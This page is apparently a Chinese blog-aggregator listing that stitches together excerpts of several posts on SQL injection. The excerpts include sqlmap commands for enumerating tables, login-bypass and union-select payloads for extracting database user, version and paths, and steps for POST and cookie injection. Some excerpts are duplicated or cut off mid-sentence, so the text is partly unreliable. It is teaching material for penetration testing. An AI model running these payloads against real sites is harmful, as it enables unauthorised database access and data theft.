sqlmap post注入

SQLMAP注入教程-11种常见SQLMAP使用方法详解

百般思念 提交于 2019-12-01 09:54:36
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法: 一、SQLMAP用于Access数据库注入 (1) 猜解是否能注入 1 2 win : python sqlmap.py - u " http://www.xxx.com/en/CompHonorBig.asp?id=7 " Linux : .lmap.py - u " http://www.xxx.com/en/CompHonorBig.asp?id=7 " (2) 猜解表 1 2 win : python sqlmap.py - u " http://www.xxx.com/en/CompHonorBig.asp?id=7 " --tables Linux : .lmap.py - u " http://www.xxx.com/en/CompHonorBig.asp?id=7 " --tables (3) 根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表) 1 2 win : python sqlmap.py - u " http://www.xxx.com/en

SQL注入笔记

余生颓废 提交于 2019-12-01 00:19:20
SQL注入笔记 服务器端程序将用户输入参数作为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器 用户登陆判断 12 SELECT * FROM users WHERE user=‘uname' AND password=‘pass‘SELECT * FROM users WHERE user=‘name' AND password='' OR ''='‘ 基于报错的检测方法 ‘ “ % ( ) 基于布尔的检测 1’ and ‘1’=‘1 1’ and ‘1’=‘2 表列数/显示信息位于哪一列 ‘ order by 9-- select * 时表字段数=查询字段数 联合查询 ’ union select 1,2--+ ’ union all select database(),2--+ hash-identifier ' union select database(),substring_index(USER(),"@",1)-- DB用户: user() DB版本: version() 全局函数: @@datadir @@hostname @@VERSION @@version_compile_os 当前库: database() ASCII转字符: char() 连接字符串: CONCAT_WS(CHAR(32,58,32),user(),database()

SQL注入笔记

穿精又带淫゛_ 提交于 2019-12-01 00:15:49
SQL注入笔记 服务器端程序将用户输入参数作为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器 用户登陆判断 12 SELECT * FROM users WHERE user=‘uname' AND password=‘pass‘SELECT * FROM users WHERE user=‘name' AND password='' OR ''='‘ 基于报错的检测方法 ‘ “ % ( ) 基于布尔的检测 1’ and ‘1’=‘1 1’ and ‘1’=‘2 表列数/显示信息位于哪一列 ‘ order by 9-- select * 时表字段数=查询字段数 联合查询 ’ union select 1,2--+ ’ union all select database(),2--+ hash-identifier ' union select database(),substring_index(USER(),"@",1)-- DB用户: user() DB版本: version() 全局函数: @@datadir @@hostname @@VERSION @@version_compile_os 当前库: database() ASCII转字符: char() 连接字符串: CONCAT_WS(CHAR(32,58,32),user(),database()

sqlmap总结

☆樱花仙子☆ 提交于 2019-11-30 20:58:10
转自:http://www.zerokeeper.com/web-security/sqlmap-usage-summary.html 0x01 需要了解 当给 sqlmap 这么一个 url 的时候,它会: 1、判断可注入的参数 2、判断可以用那种 SQL 注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 sqlmap 支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用 union 的情况下的注入。 5、堆查询注入,可以同时执行多条语句的执行时的注入。 sqlmap 支持的数据库有: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase 和 SAP MaxDB 0x02 安装 git clone https : //github.com/sqlmapproject/sqlmap.git sqlmap-dev 0x03 Options(选项):

SQLMAP注入教程-11种常见SQLMAP使用方法详解

99封情书 提交于 2019-11-28 21:37:34
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法: 一、SQLMAP用于Access数据库注入 (1) 猜解是否能注入 1 2 win : python sqlmap.py - u " http://www.xxx.com/en/CompHonorBig.asp?id=7 " Linux : .lmap.py - u " http://www.xxx.com/en/CompHonorBig.asp?id=7 " (2) 猜解表 1 2 win : python sqlmap.py - u " http://www.xxx.com/en/CompHonorBig.asp?id=7 " --tables Linux : .lmap.py - u " http://www.xxx.com/en/CompHonorBig.asp?id=7 " --tables (3) 根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表) 1 2 win : python sqlmap.py - u " http://www.xxx.com/en

关于sqlmap的一些命令

岁酱吖の 提交于 2019-11-28 21:37:13
Options(选项): --version 显示程序的版本号并退出 -h, --help 显示此帮助消息并退出 -v VERBOSE 详细级别:0-6(默认为1) Target(目标):以下至少需要设置其中一个选项,设置目标URL。 -d DIRECT 直接连接到数据库。 -u URL, --url=URL 目标URL。 -l LIST 从Burp或WebScarab代理的日志中解析目标。 -r REQUESTFILE 从一个文件中载入HTTP请求。 -g GOOGLEDORK 处理Google dork的结果作为目标URL。 -c CONFIGFILE 从INI配置文件中加载选项。 Request(请求)::这些选项可以用来指定如何连接到目标URL。 --data=DATA 通过POST发送的数据字符串 --cookie=COOKIE HTTP Cookie头 --cookie-urlencode URL 编码生成的cookie注入 --drop-set-cookie 忽略响应的Set - Cookie头信息 --user-agent=AGENT 指定 HTTP User - Agent头 --random-agent 使用随机选定的HTTP User - Agent头 --referer=REFERER 指定 HTTP Referer头 --headers=HEADERS

SQL注入:POST注入

余生颓废 提交于 2019-11-28 13:18:23
POST注入简介 POST注入属于注入的一种,相信大家在之前的课程中都知道POST\GET两种传参方式。 POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别。 POST注入高危点 登录框、查询框等各种和数据有交互的框 最经典的POST注入案例:'or 1=1 # Sqlmap如何对POST类型SQL注入进行注入 --forms sqlmap去读取页面中POST传参的表单的传参名然后进行SQL注入 -r 1.txt sqlmap读取数据包文件进行SQL注入,注入处可以打一个*号告诉Sqlmap测试那个点 post注入 在填写表单的时候提交使用post传参 一般是在用户名框或者密码框尝试 sqlmap如何跑post注入 方法一:sqlmap.py -u http://xxxxxx --form 方法二:通过抓包的方式,保存在文件中,在注入点加上 * 号提示sqlmap,同时有些注入点,是需要登录的状态下的权限,而一般的sqlmap是没有权限的,但是通过抓包的方式存在cookie 来源: https://www.cnblogs.com/yanlzy/p/11938979.html

sqlmap的post注入

蹲街弑〆低调 提交于 2019-11-28 11:38:21
目录 sqlmap的POST注入 cookie注入暴数据库 POST注入 1.验证存在注入 正常数据包" cookie:user=user" 修改" cookie:user=admin" 后都会出现 flag参数 验证Cookie: user=admin’ and ‘1’=1’ 报错,回显没有 flag,说明这种情况就存在注入 2.复制post另存为1.txt文件 >>这里是修改cookie后进行注入的,那么要结合cookie注入来看post注入的原理,其实两个是要联合进行注入的,互不影响。 cookie注入 所谓的POST注入是发送POST请就包进行注入,cookie注入是修改cookie信息进行伪装身份或者说是作为一个注入点进行渗透 1.暴数据库 >sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql --dbs >>可以看到有四个数据库 POST文件1.txt这里要写文件位置如:/root/1.txt cookie要写成:--cookie="user=admin" --string参数,用来来指定结果为true时页面所包含的字符,不包含这个字符的都会被判断为false:--string=“flag”表示正确时候回显flag这个单词 指定数据库类型:-

使用sqlmap进行SQL注入检测

纵然是瞬间 提交于 2019-11-28 05:03:52
最近公司项目被扫描出有SQL注入的漏洞,通过百度之后,决定使用sqlmap进行SQL注入的检测。这里仅仅是记录一下注入检测的步骤。 检测前准备 sqlmap是一个python编写的工具,因此我们首先要进行python环境的搭建,然后再从sqlmap官网下载最新版本。 检测步骤 查看需要检测的注入点 首先我们需要访问自己的项目,找到一个需要检测的url,这个url需要对应后台的处理,这个url对应的后台需要接收参数,并且会将我们的参数作为sql的一部分去数据库进行查询之类的操作。 如 我们有个链接 http://192.168.21.12:8080/mylink.action?userCode=admin URL检测是否存在注入点 使用python sqlmap.py -u "http://192.168.21.12:8080/mylink.action?userCode=admin" --batch 这里--batch表示不需要用户输入,使用默认行为,否则会有一些提示选择需要用户进行。 如果此URL中存在SQL注入,那么将会出现如下画面。并且可以看到 这里告诉我们后台使用的数据库类型与版本是SQLServer 2008. 获取到数据库名称 这里我们使用 python sqlmap.py -u URL --dbs --batch 可以获取到此实例下的所有数据库名称。 使用python

SqlMap免Python环境绿色版下载

 ̄綄美尐妖づ 提交于 2019-11-27 05:50:18
免Python环境绿色版下载 下载地址 下载地址 sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 1.1 sqlmap简介 sqlmap支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。 sqlmap支持五种不同的注入模式: l 基于布尔的盲注,即可以根据返回页面判断条件真假的注入; l 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断; l 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中; l 联合查询注入,可以使用union的情况下的注入; l 堆查询注入,可以同时执行多条语句的执行时的注入。 1.2 下载及安装 (1)linux下git直接安装 gitclone –depth 1 https://github.com/sqlmapproject/sqlmap.git